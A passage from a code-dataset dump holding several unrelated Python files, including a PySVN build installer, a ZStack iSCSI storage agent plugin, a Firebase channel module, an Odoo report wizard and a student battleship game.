version, so we can force its usage during\n # setup.py.\n import_path = os.path.join(src_path, 'Import')\n\n try:\n pycxx_dirname = glob.glob(os.path.join(import_path, 'pycxx*'))[0]\n except IndexError:\n sys.stderr.write('PySVN seems to be missing an Import/pycxx* '\n 'directory\\n')\n sys.stderr.write('Please report to support@beanbaginc.com.\\n')\n sys.exit(1)\n\n pycxx_path = os.path.join(import_path, pycxx_dirname)\n\n # We need to patch setup.py to specify the --pycxx-dir parameter.\n setup_py_path = os.path.join(src_path, 'setup.py')\n\n with open(setup_py_path, 'r') as fp:\n setup_py = fp.read()\n\n config_token = 'setup.py configure'\n\n if config_token not in setup_py:\n sys.stderr.write(\"PySVN's setup.py can no longer be patched.\\n\")\n sys.stderr.write('Please report to support@beanbaginc.com.\\n')\n sys.exit(1)\n\n config_args = ['--pycxx-dir=\"%s\"' % pycxx_path]\n\n if system == 'Darwin':\n debug('Enabling macOS framework support\\n')\n config_args.append('--link-python-framework-via-dynamic-lookup')\n\n # We want to include a few additional places to look for headers\n # and libraries. 
We'll start by seeing if Homebrew has some\n # information, and we'll then proceed to including the XCode versions.\n brew_svn_path = get_brew_prefix('subversion')\n brew_apr_path = get_brew_prefix('apr')\n brew_apr_util_path = get_brew_prefix('apr-util')\n\n extra_apr_include_paths = []\n extra_apr_lib_paths = []\n extra_apu_include_paths = []\n extra_svn_bin_paths = []\n extra_svn_include_paths = []\n extra_svn_lib_paths = []\n\n if brew_apr_path:\n apr_config_path = os.path.join(brew_apr_path, 'bin',\n 'apr-1-config')\n\n if os.path.exists(apr_config_path):\n extra_apr_include_paths.append(\n subprocess.check_output([apr_config_path, '--includedir'])\n .decode('utf-8').strip())\n\n brew_apr_prefix = (\n subprocess.check_output([apr_config_path, '--prefix'])\n .decode('utf-8').strip()\n )\n\n extra_apr_lib_paths.append(os.path.join(brew_apr_prefix,\n 'lib'))\n\n if brew_apr_util_path:\n apu_config_path = os.path.join(brew_apr_util_path, 'bin',\n 'apu-1-config')\n\n if os.path.exists(apu_config_path):\n extra_apu_include_paths.append(\n subprocess.check_output([apu_config_path, '--includedir'])\n .decode('utf-8').strip())\n\n if brew_svn_path and os.path.exists(brew_svn_path):\n # If SVN is installed from brew, we'll want to use those paths.\n extra_svn_bin_paths.append(os.path.join(brew_svn_path, 'bin'))\n extra_svn_include_paths.append(os.path.join(brew_svn_path,\n 'include',\n 'subversion-1'))\n extra_svn_lib_paths.append(os.path.join(brew_svn_path, 'lib'))\n\n # XCode bundle both APU directories under the same path.\n xcode_apr_path = (\n '/Library/Developer/CommandLineTools/SDKs/MacOSX.sdk'\n '/usr/include/apr-1')\n extra_apr_include_paths.append(xcode_apr_path)\n extra_apu_include_paths.append(xcode_apr_path)\n\n debug('Extra APR include paths: %r\\n' % (extra_apr_include_paths,))\n debug('Extra APR lib paths: %r\\n' % (extra_apr_lib_paths,))\n debug('Extra APU include paths: %r\\n' % (extra_apu_include_paths,))\n debug('Extra SVN bin paths: %r\\n' % 
(extra_svn_bin_paths,))\n debug('Extra SVN include paths: %r\\n' % (extra_svn_include_paths,))\n debug('Extra SVN lib paths: %r\\n' % (extra_svn_lib_paths,))\n\n for path in extra_apr_include_paths:\n if os.path.exists(os.path.join(path, 'apr.h')):\n config_args.append('--apr-inc-dir=\"%s\"' % path)\n break\n\n for path in extra_apr_lib_paths:\n if os.path.exists(os.path.join(path, 'libapr-1.dylib')):\n config_args.append('--apr-lib-dir=\"%s\"' % path)\n break\n\n for path in extra_apu_include_paths:\n if os.path.exists(os.path.join(path, 'apu.h')):\n config_args.append('--apu-inc-dir=\"%s\"' % path)\n break\n\n for path in extra_svn_bin_paths:\n if os.path.exists(os.path.join(path, 'svn')):\n config_args.append('--svn-bin-dir=\"%s\"' % path)\n break\n\n for path in extra_svn_include_paths:\n if os.path.exists(os.path.join(path, 'svn_client.h')):\n config_args.append('--svn-inc-dir=\"%s\"' % path)\n break\n\n for path in extra_svn_lib_paths:\n if os.path.exists(os.path.join(path, 'libsvn_client-1.a')):\n config_args.append('--svn-lib-dir=\"%s\"' % path)\n break\n\n debug('Using configuration arguments: %r\\n' % (config_args,))\n\n setup_py = setup_py.replace(config_token,\n '%s %s' % (config_token,\n ' '.join(config_args)))\n\n with open(setup_py_path, 'w') as fp:\n fp.write(setup_py)\n\n if install:\n cmd_args = ['-m', 'pip', 'install', src_path]\n else:\n cmd_args = ['setup.py', 'bdist_wheel', '--dist-dir', cwd]\n\n return subprocess.call([sys.executable] + cmd_args)\n\n\ndef main():\n global cwd\n global temp_path\n\n parser = argparse.ArgumentParser()\n parser.add_argument('--pysvn-version',\n default=os.environ.get('PYSVN_INSTALLER_VERSION'),\n help='A specific version of PySVN to install.')\n parser.add_argument('--file',\n default=os.environ.get('PYSVN_INSTALLER_SRC_FILE'),\n help='A specific PySVN source tarball to install.')\n parser.add_argument('--build-only',\n action='store_true',\n default=os.environ.get('PYSVN_INSTALLER_BUILD_ONLY',\n False),\n 
help=\"Build a wheel, but don't install it. The \"\n \"wheel will be stored in the current directory.\")\n\n args = parser.parse_args()\n\n cwd = os.getcwd()\n\n temp_path = tempfile.mkdtemp(suffix='.pysvn-install')\n atexit.register(destroy_temp)\n\n if args.file:\n tarball_path = args.file\n\n if not os.path.exists(tarball_path):\n sys.stderr.write('The provided PySVN tarball does not exist.\\n')\n sys.exit(1)\n else:\n if args.pysvn_version:\n pysvn_version = args.pysvn_version\n else:\n print('Looking up latest PySVN version...')\n pysvn_version = get_pysvn_version()\n\n if pysvn_version == '1.9.13':\n pysvn_version = '1.9.12'\n\n debug('PySVN %s\\n' % pysvn_version)\n\n print('Downloading PySVN %s...' % pysvn_version)\n tarball_path = fetch_pysvn(pysvn_version)\n\n print('Building PySVN...')\n src_path = extract_pysvn(tarball_path)\n retcode = build_pysvn(src_path, install=not args.build_only)\n\n if retcode == 0:\n print()\n\n if args.build_only:\n print('PySVN is built. The wheel is in the current directory.')\n else:\n print('PySVN is installed.')\n else:\n sys.stderr.write('\\n')\n sys.stderr.write('PySVN failed to install. 
You might be missing some '\n 'dependencies.\\n')\n\n system = platform.system()\n\n if system == 'Darwin':\n sys.stderr.write('On macOS, run:\\n')\n sys.stderr.write('\\n')\n sys.stderr.write(' $ xcode-select --install\\n')\n sys.stderr.write(' $ brew install subversion\\n')\n sys.stderr.write('\\n')\n sys.stderr.write('Note that you will need to install Homebrew '\n 'from https://brew.sh/\\n')\n elif system == 'Linux':\n if sys.version_info[0] == 3:\n pkg_prefix = 'python3'\n else:\n pkg_prefix = 'python'\n\n sys.stderr.write('On Linux, you will need Python development '\n 'headers and\\n')\n sys.stderr.write('Subversion development libraries.\\n')\n sys.stderr.write('\\n')\n sys.stderr.write('For Ubuntu:\\n')\n sys.stderr.write('\\n')\n sys.stderr.write(' $ sudo apt-get install %s-dev\\n'\n % pkg_prefix)\n sys.stderr.write(' $ sudo apt-get build-dep %s-svn\\n'\n % pkg_prefix)\n sys.stderr.write('\\n')\n sys.stderr.write('For RHEL/CentOS:\\n')\n sys.stderr.write('\\n')\n sys.stderr.write(' $ sudo yum install %s-devel '\n 'subversion-devel\\n'\n % pkg_prefix)\n\n sys.exit(1)\n\n\nif __name__ == '__main__':\n main()\n","sub_path":"install.py","file_name":"install.py","file_ext":"py","file_size_in_byte":12741,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"571924930","text":"import random\n\nfrom kvmagent import kvmagent\n\nfrom zstacklib.utils import lock\nfrom zstacklib.utils import jsonobject\nfrom zstacklib.utils import http\nfrom zstacklib.utils import log\nfrom zstacklib.utils import shell\nfrom zstacklib.utils import lvm\nfrom zstacklib.utils import bash\nfrom zstacklib.utils import linux\n\nlogger = log.get_logger(__name__)\n\n\nclass RetryException(Exception):\n pass\n\n\nclass AgentRsp(object):\n def __init__(self):\n self.success = True\n self.error = None\n\n\nclass IscsiTargetStruct(object):\n iscsiLunStructList = None # type: List[IscsiLunStruct]\n\n def __init__(self):\n self.iqn = \"\"\n 
self.iscsiLunStructList = []\n\n\nclass IscsiLunStruct(object):\n def __init__(self):\n self.wwids = []\n self.vendor = \"\"\n self.model = \"\"\n self.wwn = \"\"\n self.serial = \"\"\n self.hctl = \"\"\n self.type = \"\"\n self.path = \"\"\n self.size = \"\"\n self.multipathDeviceUuid = \"\"\n\n\nclass IscsiLoginRsp(AgentRsp):\n iscsiTargetStructList = None # type: List[IscsiTargetStruct]\n\n def __init__(self):\n self.iscsiTargetStructList = []\n\n\nclass StorageDevicePlugin(kvmagent.KvmAgent):\n\n ISCSI_LOGIN_PATH = \"/storagedevice/iscsi/login\"\n ISCSI_LOGOUT_PATH = \"/storagedevice/iscsi/logout\"\n FC_SCAN_PATH = \"/storage/fc/scan\"\n MULTIPATH_ENABLE_PATH = \"/storage/multipath/enable\"\n\n def start(self):\n http_server = kvmagent.get_http_server()\n http_server.register_async_uri(self.ISCSI_LOGIN_PATH, self.iscsi_login)\n http_server.register_async_uri(self.ISCSI_LOGOUT_PATH, self.iscsi_logout)\n http_server.register_async_uri(self.FC_SCAN_PATH, self.scan_sg_devices)\n http_server.register_async_uri(self.MULTIPATH_ENABLE_PATH, self.enable_multipath)\n\n def stop(self):\n pass\n\n @lock.lock('iscsiadm')\n @kvmagent.replyerror\n @bash.in_bash\n def iscsi_login(self, req):\n cmd = jsonobject.loads(req[http.REQUEST_BODY])\n rsp = IscsiLoginRsp()\n\n @linux.retry(times=5, sleep_time=1)\n def discovery_iscsi(iscsiServerIp, iscsiServerPort):\n r, o, e = bash.bash_roe(\n \"timeout 10 iscsiadm -m discovery --type sendtargets --portal %s:%s\" % (\n iscsiServerIp, iscsiServerPort))\n if r != 0:\n raise RetryException(\"can not discovery iscsi portal %s:%s\" % (iscsiServerIp, iscsiServerPort))\n return [i.strip().split(\" \")[-1] for i in o.splitlines()]\n\n @linux.retry(times=5, sleep_time=random.uniform(0.1, 3))\n def wait_iscsi_mknode(iscsiServerIp, iscsiServerPort, iqn):\n disks_by_dev = bash.bash_o(\"ls /dev/disk/by-path | grep %s:%s | grep %s\" % (iscsiServerIp, iscsiServerPort, iqn)).strip().splitlines()\n sid = bash.bash_o(\"iscsiadm -m session | grep %s:%s | 
grep %s | awk '{print $2}'\" % (iscsiServerIp, iscsiServerPort, iqn)).strip(\"[]\\n \")\n disks_by_iscsi = bash.bash_o(\"iscsiadm -m session -P 3 --sid=%s | grep Lun\" % sid).strip().splitlines()\n if len(disks_by_dev) != len(disks_by_iscsi):\n raise RetryException(\"disks number by /dev/disk not equal to iscsiadm\")\n\n iqns = cmd.iscsiTargets\n if iqns is None or len(iqns) == 0:\n try:\n iqns = discovery_iscsi(cmd.iscsiServerIp, cmd.iscsiServerPort)\n except Exception as e:\n current_hostname = shell.call('hostname')\n current_hostname = current_hostname.strip(' \\t\\n\\r')\n rsp.error = \"login iscsi server %s:%s on host %s failed, because %s\" % \\\n (cmd.iscsiServerIp, cmd.iscsiServerPort, current_hostname, e.message)\n rsp.success = False\n return jsonobject.dumps(rsp)\n\n if iqns is None or len(iqns) == 0:\n rsp.iscsiTargetStructList = []\n return jsonobject.dumps(rsp)\n\n for iqn in iqns:\n t = IscsiTargetStruct()\n t.iqn = iqn\n if cmd.iscsiChapUserName and cmd.iscsiChapUserPassword:\n bash.bash_o(\n 'iscsiadm --mode node --targetname \"%s\" -p %s:%s --op=update --name node.session.auth.authmethod --value=CHAP' % (\n iqn, cmd.iscsiServerIp, cmd.iscsiServerPort))\n bash.bash_o(\n 'iscsiadm --mode node --targetname \"%s\" -p %s:%s --op=update --name node.session.auth.username --value=%s' % (\n iqn, cmd.iscsiServerIp, cmd.iscsiServerPort, cmd.iscsiChapUserName))\n bash.bash_o(\n 'iscsiadm --mode node --targetname \"%s\" -p %s:%s --op=update --name node.session.auth.password --value=%s' % (\n iqn, cmd.iscsiServerIp, cmd.iscsiServerPort, cmd.iscsiChapUserPassword))\n bash.bash_o('iscsiadm --mode node --targetname \"%s\" -p %s:%s --login' % (\n iqn, cmd.iscsiServerIp, cmd.iscsiServerPort))\n try:\n wait_iscsi_mknode(cmd.iscsiServerIp, cmd.iscsiServerPort, iqn)\n finally:\n if bash.bash_r(\"ls /dev/disk/by-path | grep %s:%s | grep %s\" % (cmd.iscsiServerIp, cmd.iscsiServerPort, iqn)) != 0:\n rsp.iscsiTargetStructList.append(t)\n else:\n disks = bash.bash_o(\"ls 
/dev/disk/by-path | grep %s:%s | grep %s\" % (cmd.iscsiServerIp, cmd.iscsiServerPort, iqn)).strip().splitlines()\n for d in disks:\n t.iscsiLunStructList.append(self.get_disk_info_by_path(d.strip()))\n rsp.iscsiTargetStructList.append(t)\n\n return jsonobject.dumps(rsp)\n\n @staticmethod\n def get_disk_info_by_path(path):\n # type: (str) -> IscsiLunStruct\n abs_path = bash.bash_o(\"readlink -e /dev/disk/by-path/%s\" % path).strip()\n candidate_struct = lvm.get_device_info(abs_path.split(\"/\")[-1])\n lun_struct = IscsiLunStruct()\n lun_struct.path = path\n lun_struct.size = candidate_struct.size\n lun_struct.hctl = candidate_struct.hctl\n lun_struct.serial = candidate_struct.serial\n lun_struct.model = candidate_struct.model\n lun_struct.vendor = candidate_struct.vendor\n lun_struct.type = candidate_struct.type\n lun_struct.wwn = candidate_struct.wwn\n lun_struct.wwids = candidate_struct.wwids\n if lvm.is_slave_of_multipath(abs_path):\n lun_struct.type = \"mpath\"\n mpath_wwid = bash.bash_o(\"multipath -l %s | egrep ^mpath | awk '{print $2}'\" % abs_path).strip(\"() \\n\")\n lun_struct.wwids = [mpath_wwid]\n return lun_struct\n\n @lock.lock('iscsiadm')\n @kvmagent.replyerror\n def iscsi_logout(self, req):\n cmd = jsonobject.loads(req[http.REQUEST_BODY])\n rsp = AgentRsp()\n\n iqns = cmd.iscsiTargets\n if iqns is None or len(iqns) == 0:\n iqns = shell.call(\"timeout 10 iscsiadm -m discovery --type sendtargets --portal %s:%s | awk '{print $2}'\" % (\n cmd.iscsiServerIp, cmd.iscsiServerPort)).strip().splitlines()\n\n if iqns is None or len(iqns) == 0:\n rsp.iscsiTargetStructList = []\n return jsonobject.dumps(rsp)\n\n for iqn in iqns:\n shell.call('timeout 10 iscsiadm --mode node --targetname \"%s\" -p %s:%s --logout' % (\n iqn, cmd.iscsiServerIp, cmd.iscsiServerPort))\n\n return jsonobject.dumps(rsp)\n\n @kvmagent.replyerror\n @bash.in_bash\n def scan_sg_devices(self, req):\n rsp = AgentRsp()\n bash.bash_roe(\"sg_scan -i\")\n return jsonobject.dumps(rsp)\n\n 
@kvmagent.replyerror\n @bash.in_bash\n @linux.retry(times=3, sleep_time=1)\n def enable_multipath(self, req):\n rsp = AgentRsp()\n bash.bash_roe(\"modprobe dm-multipath\")\n bash.bash_roe(\"modprobe dm-round-robin\")\n bash.bash_roe(\"mpathconf --enable --with_multipathd y\")\n if not lvm.is_multipath_running:\n raise RetryException(\"multipath still not running\")\n return jsonobject.dumps(rsp)","sub_path":"kvmagent/kvmagent/plugins/storage_device.py","file_name":"storage_device.py","file_ext":"py","file_size_in_byte":8087,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"241637596","text":"import base64\nimport logging\nimport string\nimport time\nimport uuid\n\nfrom .credentials import build_token, decode_token\nfrom .firebase import Firebase\n\nfrom video_src.constants import project_name\n\n_client = None\n_logger = logging.getLogger(\"firechannel.channel\")\n\n#: Valid client id characters.\nVALID_CHARS = set(string.ascii_letters + string.digits + \"-_\")\n\ndef get_client():\n \"\"\"Get the current global client instance.\n\n If one doesn't currently exist, a default client will be created\n and returned on GAE and a RuntimeError will be raised everywhere\n else.\n\n Returns:\n Firebase\n \"\"\"\n global _client\n if _client is None:\n _client = _client = Firebase(project_name)\n\n return _client\n\n\ndef set_client(client):\n \"\"\"Set the global client instance.\n\n Parameters:\n client(Firebase)\n \"\"\"\n global _client\n _client = client\n\n\ndef decode_client_id(token, firebase_client=None):\n \"\"\"Given a token, decode and return its client id.\n \"\"\"\n client = firebase_client or get_client()\n return decode_token(client.credentials, token)[\"uid\"]\n\n\ndef _validate_client_id(client_id, firebase_client=None):\n if not isinstance(client_id, basestring):\n raise TypeError(\"client_id must be a string\")\n\n elif client_id.count(\".\") == 2:\n return decode_client_id(client_id, 
firebase_client=firebase_client)\n\n elif len(client_id) > 64:\n raise ValueError(\"client_id must be at most 64 characters long\")\n\n elif set(client_id) - VALID_CHARS:\n raise ValueError(\"client_id contains invalid characters\")\n\n return client_id\n\n\ndef _validate_duration(duration_minutes):\n if not isinstance(duration_minutes, int):\n raise TypeError(\"duration_minutes must be an integer\")\n\n elif not (1 <= duration_minutes <= 1440):\n raise ValueError(\"duration_minutes must be a value between 1 and 1440\")\n\n\ndef create_channel(client_id=None, duration_minutes=60, firebase_client=None):\n \"\"\"Create a channel.\n\n Parameters:\n client_id(str): A string to identify this channel in Firebase.\n duration_minutes(int): An int specifying the number of minutes\n for which the returned should be valid.\n firebase_client(Firebase): The Firebase client instance to\n use. This can be omitted on AppEngine.\n\n Raises:\n FirebaseError: When Firebase is down.\n TypeError: When client_id or duration_minutes have invalid types.\n ValueError: When client_id or duration_minutes have invalid values.\n\n Returns:\n str: A token that the client can use to connect to the channel.\n \"\"\"\n if client_id is None:\n client_id = str(uuid.uuid4())\n\n client = firebase_client or get_client()\n client_id = _validate_client_id(client_id, firebase_client=client)\n _validate_duration(duration_minutes)\n\n # Delete the channel so any old data isn't sent to the client.\n delete_channel(client_id, firebase_client=client)\n return build_token(client.credentials, {\"uid\": client_id}, duration_minutes)\n\n\ndef delete_channel(client_id, firebase_client=None):\n \"\"\"Delete a channel.\n\n Parameters:\n client_id(str): A string to identify this channel in Firebase.\n firebase_client(Firebase): The Firebase client instance to\n use. 
This can be omitted on AppEngine.\n\n Raises:\n FirebaseError: When Firebase is down.\n TypeError: When client_id has an invalid type.\n ValueError: When client_id has an invalid value.\n \"\"\"\n client = firebase_client or get_client()\n client_id = _validate_client_id(client_id, firebase_client=client)\n client.delete(u\"firechannels/{}.json\".format(client_id))\n _logger.debug(\"Deleted channel %r.\", client_id)\n\n\ndef send_message(client_id, message, firebase_client=None):\n \"\"\"Send a message to a channel.\n\n Parameters:\n client_id(str): A string to identify this channel in Firebase.\n message(str): A string representing the message to send.\n firebase_client(Firebase): The Firebase client instance to\n use. This can be omitted on AppEngine.\n\n Raises:\n FirebaseError: When Firebase is down.\n TypeError: When client_id has an invalid type.\n ValueError: When client_id has an invalid value.\n \"\"\"\n assert isinstance(message, basestring), \"messages must be strings\"\n client = firebase_client or get_client()\n client_id = _validate_client_id(client_id, firebase_client=client)\n client.patch(u\"firechannels/{}.json\".format(client_id), {\n \"message\": base64.b64encode(message),\n \"timestamp\": int(time.time() * 1000),\n })\n\n\ndef find_all_expired_channels(max_age=3600, firebase_client=None):\n \"\"\"Returns the ids of any channels to which the last message was\n sent over some number of seconds ago.\n\n Parameters:\n max_age(int): Channels that were last sent a message longer than\n this value ago are returned. 
Defaults to an hour.\n \"\"\"\n client = firebase_client or get_client()\n cutoff = (time.time() - max_age) * 1000\n channels = client.get(\"firechannels.json\") or {}\n for client_id, channel in channels.items():\n if not isinstance(channel, dict):\n yield client_id\n continue\n\n timestamp = channel.get(\"timestamp\", 0)\n if timestamp <= cutoff:\n yield client_id\n","sub_path":"firechannel/channel.py","file_name":"channel.py","file_ext":"py","file_size_in_byte":5307,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"581621060","text":"# -*- coding: utf-8 -*-\nfrom odoo import models, fields\n\n\nclass GrpCreateReportWizard(models.TransientModel):\n _name = 'grp.create.report.wizard'\n\n name = fields.Many2one('account.report.group', required=1, readonly=1)\n balance_id = fields.Many2one('dl.report.balance', string='Balance', required=True)\n date_debut = fields.Date(related='balance_id.date_debut', string=u'Date début', readonly=1)\n date_fin = fields.Date(related='balance_id.date_fin', string=u'Date fin', readonly=1)\n exercice = fields.Char(related='balance_id.exercice', string='Exercice', readonly=1)\n devise_id = fields.Many2one(related='balance_id.devise_id', string=u'Unité d\\'affichage', readonly=1)\n valid = fields.Boolean('Créer les rapports juste pour les modèles validés')\n\n def action_create(self):\n self.name.report_ids.unlink()\n for model in self.name.model_ids:\n report = self.env['dl.account.report.report'].create({\n 'model_id' : model.id,\n 'balance_id' : self.balance_id.id,\n 'company_d' : self.env.user.company_id.id,\n 'name' : model.name,\n 'code' : model.code + '-' + self.exercice\n })\n if not model.specifique:\n report.update_all()\n # else:\n # if model.specifique_rep == '7_immo_cede':\n # 
report.update_specifique7()\n","sub_path":"l10n_dz_reports/wizard/grp_create_report.py","file_name":"grp_create_report.py","file_ext":"py","file_size_in_byte":1453,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"621563685","text":"def direction_repr_str(direction_class, direction):\n \"\"\"\n Converts a direction to string.\n :param direction: The direction to convert to string. Should be one of the\n constants of the Direction class ([UP, DOWN, LEFT, RIGHT, NOT_MOVING)\n :return: A string representation for a valid direction input or the string\n 'UNKNOWN' if the input direction is not valid.\n \"\"\"\n if direction == direction_class.NOT_MOVING:\n return 'NOT MOVING'\n elif direction == direction_class.UP:\n return 'UP'\n elif direction == direction_class.DOWN:\n return 'DOWN'\n elif direction == direction_class.LEFT:\n return 'LEFT'\n elif direction == direction_class.RIGHT:\n return 'RIGHT'\n else:\n return 'UNKNOWN'\n\n\n\n############################################################\n# Imports\n############################################################\nimport game_helper as gh\n############################################################\n# Class definition\n############################################################\n\n\nclass Game:\n \"\"\"\n A class representing a battleship game.\n A game is composed of ships that are moving on a square board and a user\n which tries to guess the locations of the ships by guessing their\n coordinates.\n \"\"\"\n\n def __init__(self, board_size, ships):\n \"\"\"\n Initialize a new Game object.\n :param board_size: Length of the side of the game-board\n :param ships: A list of ships that participate in the game.\n :return: A new Game object.\n \"\"\"\n self.__board_size = board_size\n self.__ships = ships\n self.__damaged_ships = []\n self.__terminated_ships = []\n self.__bomb_on_board = {}\n self.__healthy_ships = []\n self.__hit_ship_cells = []\n\n def 
__play_one_round(self):\n \"\"\"\n Note - this function is here to guide you and it is *not mandatory*\n to implement it. The logic defined by this function must be implemented\n but if you wish to do so in another function (or some other functions)\n it is ok.\n\n Te function runs one round of the game :\n 1. Get user coordinate choice for bombing.\n 2. Move all game's ships.\n 3. Update all ships and bombs.\n 4. Report to the user the result of current round (number of hits and\n terminated ships)\n :return:\n (some constant you may want implement which represents) Game status :\n GAME_STATUS_ONGOING if there are still ships on the board or\n GAME_STATUS_ENDED otherwise.\n \"\"\"\n new_bomb = gh.get_target(self.__board_size)\n self.__bomb_on_board[new_bomb] = 4\n self.ship_mover()\n self.damaged_ships()\n self.bombs_life_time()\n hits = self.last_hit(new_bomb)\n self.remove_items(hits[0])\n self.not_damaged_pos()\n self.damaged_pos()\n terminations = self.terminated_ships()\n gh.report(gh.board_to_string(self.__board_size, hits[0],\n self.__bomb_on_board,\n self.__hit_ship_cells,\n self.__healthy_ships))\n gh.report_turn(hits[1], terminations)\n\n def __repr__(self):\n \"\"\"\n Return a string representation of the board's game\n :return: A tuple converted to string. The tuple should contain (maintain\n the following order):\n 1. Board's size.\n 2. A dictionary of the bombs found on the board\n {(pos_x, pos_y) : remaining turns}\n For example :\n {(0, 1) : 2, (3, 2) : 1}\n 3. A list of the ships found on the board (each ship should be\n represented by its __repr__ string).\n \"\"\"\n game_tuple = (self.__board_size, self.__bomb_on_board, self.__ships)\n return str(game_tuple)\n\n def play(self):\n \"\"\"\n The main driver of the Game. 
Manages the game until completion.\n completion.\n :return: None\n \"\"\"\n gh.report_legend()\n all_ships_coordinates = []\n for ship in self.__ships:\n all_ships_coordinates += ship.coordinates()\n print(gh.board_to_string(self.__board_size, [], self.__bomb_on_board,\n [], all_ships_coordinates))\n while len(self.__ships) != 0:\n self.__play_one_round()\n gh.report_gameover()\n\n def ship_mover(self):\n \"\"\"\n move the ships using move() in class ship\n \"\"\"\n for ship in self.__ships:\n ship.move()\n\n def damaged_ships(self):\n for ship in self.__ships:\n if len(ship.damaged_cells()) != 0:\n self.__damaged_ships.append(ship)\n\n def terminated_ships(self):\n \"\"\"\n remove ships that were hit in all of their cells\n :return: terminated_counter - num of terminated ships\n \"\"\"\n terminated_counter = 0\n for ship in self.__ships:\n if ship.terminated():\n terminated_counter += 1\n self.__terminated_ships.append(ship)\n self.__ships.remove(ship)\n return terminated_counter\n\n def bombs_life_time(self):\n \"\"\"\n count down three turns for a single bomb and update\n self.__bomb_on_board\n \"\"\"\n temp_bombs = {}\n for bomb in self.__bomb_on_board:\n if self.__bomb_on_board[bomb] != 1:\n self.__bomb_on_board[bomb] -= 1\n temp_bombs[bomb] = self.__bomb_on_board[bomb]\n self.__bomb_on_board = temp_bombs\n\n def damaged_pos(self):\n \"\"\"\n append damaged positions of ships on the board\n \"\"\"\n self.__hit_ship_cells = []\n for ship in self.__ships:\n for pos in ship.coordinates():\n if pos in ship.damaged_cells():\n self.__hit_ship_cells.append(pos)\n\n def not_damaged_pos(self):\n \"\"\"\n append non-damaged positions of ships on the board\n \"\"\"\n self.__healthy_ships = []\n for ship in self.__ships:\n for pos in ship.coordinates():\n if pos not in ship.damaged_cells():\n self.__healthy_ships.append(pos)\n\n def last_hit(self):\n \"\"\"\n count the number of hits and returns a list of hits positions and\n the number of hits\n :return: a list of hits 
positions and the number of hits\n \"\"\"\n hits = []\n hits_counter = 0\n for pos in self.__bomb_on_board:\n for ship in self.__ships:\n if ship.hit(pos):\n hits.append(pos)\n hits_counter += 1\n hits_count = [hits, hits_counter]\n return hits_count\n\n def remove_items(self, list_of_coordinates):\n \"\"\"\n remove items from a given dictionary that appear in a given list\n :param list_of_coordinates: a list\n \"\"\"\n for key in list_of_coordinates:\n if key in self.__bomb_on_board:\n del self.__bomb_on_board[key]\n","sub_path":"ex8/ship_helper.py","file_name":"ship_helper.py","file_ext":"py","file_size_in_byte":7170,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"640022064","text":"import tkinter as tk\nfrom tkinter import messagebox\nimport time\n\ndef sleeper():\n while True:\n # Gets the user input on time they want\n np = input('I want an update every X minutes: ')\n\n # tries to convert input into a floating point number in minutes\n try:\n np = float(np)*60\n except ValueError:\n print('Please enter a number\\n')\n continue\n \n # runs the time.sleep() command\n # shows before and after time that the program was run \n print('Time before the program ran: %s' % time.ctime() )\n time.sleep(np)\n\n # function that I want to reoccur activation commands go here:\n \n # creates the window/pop up \n root = tk.Tk() \n\n canvas1 = tk.Canvas(root, width = 800, height = 500)\n canvas1.pack()\n\n button1 = tk.Button (root, text='Exit Application', command=ExitApplication)\n canvas1.create_window(97, 270, window=button1)\n\n root.mainloop()\n\n print('Time after the program completed: %s' % time.ctime() )\n\ndef ExitApplication():\n MsgBox = tk.messagebox.askquestion('Exit Application', 'Are you sure that you want to exit this application?', icon='warning')\n if MsgBox == 'yes':\n root.destroy()\n else:\n tk.messagebox.showinfo('Return', 'You will now return to the application screen')\n\ntry:\n sleeper()\nexcept 
KeyboardInterrupt:\n print('\\n\\nKeyboard exception received. Exiting.')\n exit()\n","sub_path":"unused/sleeper.py","file_name":"sleeper.py","file_ext":"py","file_size_in_byte":1490,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"376822975","text":"import os\r\nfrom operator import itemgetter\r\nMenu = '0 - Выход из программы\\n1 - Количество файлов в директории\\n2 - Сортировка данных файла products.txt по названию\\n'\r\nMenu2 = '0 - Назад\\n1 - Уменьшить количество продуктов\\n2 - Сохранить в исходный файл\\n3 - Сохранить в указанную директорию\\n'\r\nflagIn = ''\r\nproductsList = []\r\n\r\ndef filesCount():\r\n link = str(input('Введите путь к директори��\\n'))\r\n print(\"Количество файлов в директории:\" + str(len(next(os.walk(link))[2])))\r\n \r\ndef fileReading(productsList):\r\n global first_str\r\n with open('C:/users/Кирилл/Desktop/products.txt') as f:\r\n for line in f:\r\n productsList.append([x for x in line.rstrip('\\n').split(';')])\r\n first_str = productsList[0]\r\n del productsList[0]\r\n return productsList\r\n\r\ndef listSorting(productsList):\r\n productsList.sort(key=itemgetter(1))\r\n return productsList\r\n \r\ndef quantityReduction(productsList, numbers, count):\r\n for i in productsList:\r\n for j in numbers:\r\n if i[0] == j:\r\n i[3] = str(int(i[3]) - int(count))\r\n return productsList\r\n\r\ndef saveNewFile(productsList):\r\n link = input('Введите путь к директории: \\n')\r\n with open(link+\"\\products.txt\", \"w\") as f:\r\n f.write(';'.join(first_str)+'\\n')\r\n i = 0\r\n while i= 0:\r\n revenue_total += revenue\r\n if budget >= 0:\r\n budget_total += budget\r\n #text\r\n release_date = row[13]\r\n title = row[19]\r\n companies_text = row[12] #need to be parsed, class\r\n genres_text = row[3]\r\n x_genres_text.append(genres_text)\r\n x_companies_text.append(companies_text)\r\n\r\n genre_array = ast.literal_eval(genres_text)\r\n company_array = 
